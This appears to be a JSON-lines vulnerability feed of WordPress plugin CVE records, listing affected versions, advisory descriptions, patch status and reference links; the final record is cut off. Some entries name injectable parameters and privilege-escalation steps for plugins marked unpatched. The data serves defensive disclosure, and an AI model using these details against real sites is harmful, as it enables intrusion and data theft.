{"CVE_ID":"CVE-2024-8959","slug":"adminify","versionImpact":"4.0.1.6","description":"The WP Adminify \u2013 Custom WordPress Dashboard, Login and Admin Customizer plugin for WordPress is vulnerable to Stored Cross-Site Scripting via SVG File uploads in all versions up to, and including, 4.0.1.6 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Author-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses the SVG file.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/68094545-0e2a-429d-95b7-bfa86eca1caa?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/68094545-0e2a-429d-95b7-bfa86eca1caa?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/adminify\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/adminify\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wpadminify.com\\\/changelogs\",\"name\":\"https:\\\/\\\/wpadminify.com\\\/changelogs\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3165558\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3165558\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-10179","slug":"slick-engagement","versionImpact":"1.4.4","description":"The Slickstream: Engagement and Conversions plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's slick-grid shortcode in all versions up to, and including, 1.4.4 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/28216197-20b4-4d12-a610-661dca6fbbf2?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/28216197-20b4-4d12-a610-661dca6fbbf2?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/slick-engagement\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/slick-engagement\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3184136\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3184136\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-11431","slug":"ragic-shortcode","versionImpact":"1.2","description":"The Ragic Shortcode plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'ragic' shortcode in all versions up to, and including, 1.2 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/ragic-shortcode\\\/trunk\\\/ragic.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/ragic-shortcode\\\/trunk\\\/ragic.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3194610%40ragic-shortcode&new=3194610%40ragic-shortcode&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3194610%40ragic-shortcode&new=3194610%40ragic-shortcode&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/ragic-shortcode\\\/\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/ragic-shortcode\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/4afa0148-ad08-493d-9642-0edbde5e8349?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/4afa0148-ad08-493d-9642-0edbde5e8349?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-23828","slug":"wordpress-data-guards","versionImpact":"8","description":"Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in OriginalTips.com WordPress Data Guard allows Stored XSS. This issue affects WordPress Data Guard: from n\/a through 8.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/patchstack.com\\\/database\\\/wordpress\\\/plugin\\\/wordpress-data-guards\\\/vulnerability\\\/wordpress-wordpress-data-guard-website-security-plugin-8-csrf-to-stored-xss-vulnerability?_s_id=cve\",\"name\":\"https:\\\/\\\/patchstack.com\\\/database\\\/wordpress\\\/plugin\\\/wordpress-data-guards\\\/vulnerability\\\/wordpress-wordpress-data-guard-website-security-plugin-8-csrf-to-stored-xss-vulnerability?_s_id=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-8702","slug":"backup-database","versionImpact":"4.9","description":"The Backup Database WordPress plugin through 4.9 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup).","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/2199ef66-25bd-4eb4-a675-d8b30f047847\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/2199ef66-25bd-4eb4-a675-d8b30f047847\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2022-41620","slug":"seosamba-webmasters","versionImpact":"1.0.5","description":"Cross-Site Request Forgery (CSRF) vulnerability in SeoSamba for WordPress Webmasters plugin <= 1.0.5 versions.","refs":"[{\"url\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/seosamba-webmasters\\\/wordpress-seosamba-for-wordpress-webmasters-plugin-1-0-5-cross-site-request-forgery-csrf-vulnerability?_s_id=cve\",\"name\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/seosamba-webmasters\\\/wordpress-seosamba-for-wordpress-webmasters-plugin-1-0-5-cross-site-request-forgery-csrf-vulnerability?_s_id=cve\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-2278","slug":"wpdirectorykit","versionImpact":"1.1.9","description":"The WP Directory Kit plugin for WordPress is vulnerable to Local File Inclusion in versions up to, and including, 1.1.9 via the 'wdk_public_action' function. This allows unauthenticated attackers to include and execute arbitrary files on the server, allowing the execution of any PHP code in those files. This can be used to bypass access controls, obtain sensitive data, or achieve code execution in cases where images and other \u201csafe\u201d file types can be uploaded and included.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2904689\\\/wpdirectorykit\\\/trunk\\\/vendor\\\/Winter_MVC\\\/core\\\/mvc_loader.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2904689\\\/wpdirectorykit\\\/trunk\\\/vendor\\\/Winter_MVC\\\/core\\\/mvc_loader.php\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/87399a07-d2d8-42cd-81f0-9060f6cfff48?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/87399a07-d2d8-42cd-81f0-9060f6cfff48?source=cve\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wpdirectorykit\\\/tags\\\/1.1.8\\\/vendor\\\/Winter_MVC\\\/core\\\/mvc_loader.php#L91\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wpdirectorykit\\\/tags\\\/1.1.8\\\/vendor\\\/Winter_MVC\\\/core\\\/mvc_loader.php#L91\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-5956","slug":"advanced-quiz","versionImpact":"1.0.3","description":"The Wp-Adv-Quiz WordPress plugin through 1.0.2 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup).","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/b3d1fbae-88c9-45d1-92c6-0a529b21e3b2\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/b3d1fbae-88c9-45d1-92c6-0a529b21e3b2\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-1282","slug":"email-encoder-bundle","versionImpact":"2.2.0","description":"The Email Encoder \u2013 Protect Email Addresses and Phone Numbers plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's shortcode(s) in all versions up to, and including, 2.2.0 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers with contributor-level and above permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/78da1f88-2446-4ea5-9437-a118324ab6c2?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/78da1f88-2446-4ea5-9437-a118324ab6c2?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/email-encoder-bundle\\\/tags\\\/2.2.0\\\/core\\\/includes\\\/classes\\\/class-email-encoder-bundle-run.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/email-encoder-bundle\\\/tags\\\/2.2.0\\\/core\\\/includes\\\/classes\\\/class-email-encoder-bundle-run.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/email-encoder-bundle\\\/tags\\\/2.2.0\\\/core\\\/includes\\\/classes\\\/class-email-encoder-bundle-helpers.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/email-encoder-bundle\\\/tags\\\/2.2.0\\\/core\\\/includes\\\/classes\\\/class-email-encoder-bundle-helpers.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/email-encoder-bundle\\\/tags\\\/2.2.0\\\/core\\\/includes\\\/classes\\\/class-email-encoder-bundle-validate.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/email-encoder-bundle\\\/tags\\\/2.2.0\\\/core\\\/includes\\\/classes\\\/class-email-encoder-bundle-validate.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3033889%40email-encoder-bundle%2Ftrunk&old=3020142%40email-encoder-bundle%2Ftrunk&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3033889%40email-encoder-bundle%2Ftrunk&old=3020142%40email-encoder-bundle%2Ftrunk&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-6809","slug":"beepress","versionImpact":"0.1","description":"The Custom fields shortcode plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's cf shortcode in all versions up to, and including, 0.1 due to insufficient input sanitization and output escaping on user supplied custom post meta values. This makes it possible for authenticated attackers with contributor-level and above permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/99d3d5aa-dd82-415a-bc40-9d2c677d9248?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/99d3d5aa-dd82-415a-bc40-9d2c677d9248?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/beepress\\\/\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/beepress\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-1678","slug":"subway","versionImpact":"2.1.4","description":"The Subway \u2013 Private Site Option plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 2.1.4 via the REST API. This makes it possible for unauthenticated attackers to bypass the plugin's private site feature and view restricted page and post content.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/5b80638b-4dd1-47f5-9a70-6bd626ac6986?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/5b80638b-4dd1-47f5-9a70-6bd626ac6986?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/subway\\\/\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/subway\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-4895","slug":"wpdatatables","versionImpact":"3.4.2.12","description":"The wpDataTables \u2013 WordPress Data Table, Dynamic Tables & Table Charts Plugin plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the CSV import functionality in all versions up to, and including, 3.4.2.12 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/0c944e08-1b70-4b56-80eb-f588c0fab5b6?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/0c944e08-1b70-4b56-80eb-f588c0fab5b6?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3089897\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3089897\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/wpdatatables\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/wpdatatables\\\/#developers\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-6028","slug":"quiz-maker","versionImpact":"6.5.8.3","description":"The Quiz Maker plugin for WordPress is vulnerable to time-based SQL Injection via the 'ays_questions' parameter in all versions up to, and including, 6.5.8.3 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/ab340c65-35eb-4a85-8150-3119b46c7f35?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/ab340c65-35eb-4a85-8150-3119b46c7f35?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/quiz-maker\\\/tags\\\/6.5.7.5\\\/public\\\/class-quiz-maker-public.php#L4904\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/quiz-maker\\\/tags\\\/6.5.7.5\\\/public\\\/class-quiz-maker-public.php#L4904\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/quiz-maker\\\/tags\\\/6.5.7.5\\\/public\\\/class-quiz-maker-public.php#L6901\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/quiz-maker\\\/tags\\\/6.5.7.5\\\/public\\\/class-quiz-maker-public.php#L6901\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/quiz-maker\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/quiz-maker\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3103402\\\/quiz-maker\\\/tags\\\/6.5.8.2\\\/public\\\/class-quiz-maker-public.php?old=3102679&old_path=quiz-maker%2Ftags%2F6.5.8.1%2Fpublic%2Fclass-quiz-maker-public.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3103402\\\/quiz-maker\\\/tags\\\/6.5.8.2\\\/public\\\/class-quiz-maker-public.php?old=3102679&old_path=quiz-maker%2Ftags%2F6.5.8.1%2Fpublic%2Fclass-quiz-maker-public.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3105555\\\/quiz-maker\\\/tags\\\/6.5.8.4\\\/public\\\/class-quiz-maker-public.php?old=3104323&old_path=quiz-maker%2Ftags%2F6.5.8.3%2Fpublic%2Fclass-quiz-maker-public.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3105555\\\/quiz-maker\\\/tags\\\/6.5.8.4\\\/public\\\/class-quiz-maker-public.php?old=3104323&old_path=quiz-maker%2Ftags%2F6.5.8.3%2Fpublic%2Fclass-quiz-maker-public.php\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-8056","slug":"mm-breaking-news","versionImpact":"0.7.9","description":"The MM-Breaking News WordPress plugin through 0.7.9 does not escape the $_SERVER['REQUEST_URI'] parameter before outputting it back in an attribute, which could lead to Reflected Cross-Site Scripting in old web browsers","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/203b8122-f1e5-4e9e-ba83-f5cd59d8a289\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/203b8122-f1e5-4e9e-ba83-f5cd59d8a289\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-23823","slug":"cnzz51la-for-wordpress","versionImpact":"1.0.1","description":"Cross-Site Request Forgery (CSRF) vulnerability in jprintf CNZZ&51LA for WordPress allows Cross Site Request Forgery. This issue affects CNZZ&51LA for WordPress: from n\/a through 1.0.1.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/patchstack.com\\\/database\\\/wordpress\\\/plugin\\\/cnzz51la-for-wordpress\\\/vulnerability\\\/wordpress-cnzz-51la-for-wordpress-plugin-1-0-1-csrf-to-stored-xss-vulnerability?_s_id=cve\",\"name\":\"https:\\\/\\\/patchstack.com\\\/database\\\/wordpress\\\/plugin\\\/cnzz51la-for-wordpress\\\/vulnerability\\\/wordpress-cnzz-51la-for-wordpress-plugin-1-0-1-csrf-to-stored-xss-vulnerability?_s_id=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-0809","slug":"permalink-finder","versionImpact":"3.4","description":"The Link Fixer plugin for WordPress is vulnerable to Stored Cross-Site Scripting via broken links in all versions up to, and including, 3.4 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/permalink-finder\\\/\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/permalink-finder\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/37198f2f-2b45-40d3-b4ae-aa94213996bd?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/37198f2f-2b45-40d3-b4ae-aa94213996bd?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13809","slug":"hslide","versionImpact":"1.3.5","description":"The Hero Slider - WordPress Slider Plugin plugin for WordPress is vulnerable to SQL Injection via several parameters in all versions up to, and including, 1.3.5 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query.  This makes it possible for authenticated attackers, with Subscriber-level access and above, to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/codecanyon.net\\\/item\\\/hero-slider-wordpress-slider-plugin\\\/13067813\",\"name\":\"https:\\\/\\\/codecanyon.net\\\/item\\\/hero-slider-wordpress-slider-plugin\\\/13067813\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/a692d9c4-66e0-4461-ad13-65e1446106c5?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/a692d9c4-66e0-4461-ad13-65e1446106c5?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-2576","slug":"ayyash-studio","versionImpact":"1.0.3","description":"The Ayyash Studio \u2014 The kick-start kit plugin for WordPress is vulnerable to Stored Cross-Site Scripting via SVG File uploads in all versions up to, and including, 1.0.3 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Author-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses the SVG file.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/ayyash-studio\\\/tags\\\/1.0.3\\\/includes\\\/Importer\\\/Wxr\\\/StudioImporter.php#L351\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/ayyash-studio\\\/tags\\\/1.0.3\\\/includes\\\/Importer\\\/Wxr\\\/StudioImporter.php#L351\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/ayyash-studio\\\/tags\\\/1.0.3\\\/includes\\\/Importer\\\/Wxr\\\/StudioImporter.php#L37\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/ayyash-studio\\\/tags\\\/1.0.3\\\/includes\\\/Importer\\\/Wxr\\\/StudioImporter.php#L37\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/ayyash-studio\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/ayyash-studio\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/634fa1ed-ad6b-4875-b6f9-f20add39dc80?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/634fa1ed-ad6b-4875-b6f9-f20add39dc80?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-3615","slug":"fluentform","versionImpact":"6.0.2","description":"The Fluent Forms plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the form-submission.js script in all versions up to, and including, 6.0.2 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/fluentform\\\/tags\\\/6.0.2\\\/assets\\\/js\\\/form-submission.js\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/fluentform\\\/tags\\\/6.0.2\\\/assets\\\/js\\\/form-submission.js\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3274693\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3274693\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/fluentform\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/fluentform\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/f31bd18e-57d4-4c87-8a7c-a168e7e70061?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/f31bd18e-57d4-4c87-8a7c-a168e7e70061?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-8701","slug":"event-calendars","versionImpact":"1.0.4","description":"The events-calendar WordPress plugin through 1.0.4 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup).","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/707d4b5b-8efe-4010-ba7d-80538545a2d5\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/707d4b5b-8efe-4010-ba7d-80538545a2d5\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-5117","slug":"property","description":"The Property plugin for WordPress is vulnerable to Privilege Escalation due to a missing capability check on the use of the property_package_user_role metadata in versions 1.0.5 to 1.0.6. This makes it possible for authenticated attackers, with Author-level access and above, to elevate their privileges to that of an administrator by creating a package post whose property_package_user_role is set to administrator and then submitting the PayPal registration form.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/property\\\/tags\\\/1.0.6\\\/admin\\\/pages\\\/payment-inc\\\/paypal-submit.php#L128\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/property\\\/tags\\\/1.0.6\\\/admin\\\/pages\\\/payment-inc\\\/paypal-submit.php#L128\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/property\\\/tags\\\/1.0.6\\\/property.php#L1964\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/property\\\/tags\\\/1.0.6\\\/property.php#L1964\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3299714\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3299714\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/property\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/property\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/df48f7f9-7bc9-4f9b-b9b5-6bfb86309030?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/df48f7f9-7bc9-4f9b-b9b5-6bfb86309030?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-5339","slug":"ap-plugin-scripteo","versionImpact":"4.89","description":"The Ads Pro Plugin - Multi-Purpose WordPress Advertising Manager plugin for WordPress is vulnerable to time-based SQL Injection via the \u2018bsa_pro_id\u2019 parameter in all versions up to, and including, 4.89 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query.  This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a 